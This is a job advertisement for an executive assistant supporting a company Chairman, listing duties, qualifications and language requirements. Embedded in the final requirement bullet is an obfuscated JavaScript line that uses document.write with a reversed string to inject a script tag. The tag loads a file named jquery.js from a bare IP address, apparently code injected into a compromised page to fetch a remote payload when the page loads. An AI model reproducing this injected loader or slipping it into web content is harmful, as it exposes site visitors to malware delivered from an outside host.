Industry : Services
• Provides comprehensive executive support to the Chairman – managing email correspondences, phone calls, diary management (internal / external meetings, social events, conference calls, webinars, etc), preparing meetings’ presentation materials, travel, hotel and visa arrangements, as well as performing ad hoc task assigned.
• Collaboratively review and recommend changes to the Chairman pertaining company’s practices
• Commitment to discretion and confidentiality concerning sensitive company information.
• Excellent organizational skills, a proactive mind set, and ability to multitask and prioritise work.
• Organise various networking engagements to foster closer relationship with Business Associates, Lawyers, Bankers & Ambassadors / Commercial Trade Officers include sourcing of venues and related services and managing delivery in line with allocated budget.
• Responsible in handling the daily administrative and operational matter and liaising with respective Head of Departments on operational matters
• Prepares and update constantly reports of plans and procedures for Chairman’s review
• Candidate must possess at least a Professional Certificate, Diploma, Bachelor’s Degree in Business / Administration / Management or Secretarial, or equivalent.
• Candidate with accounting background will be an added advantage
• At least 10 years of working experience in the related field is required for this position
• Proficiency in written and verbal communication skills in English and Bahasa Malaysia.
• Self-motivated to work independently with minimum supervision
• Pleasant personality, self-motivated, good interpersonal and communication skills document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))
To apply for this job email your details to email@example.com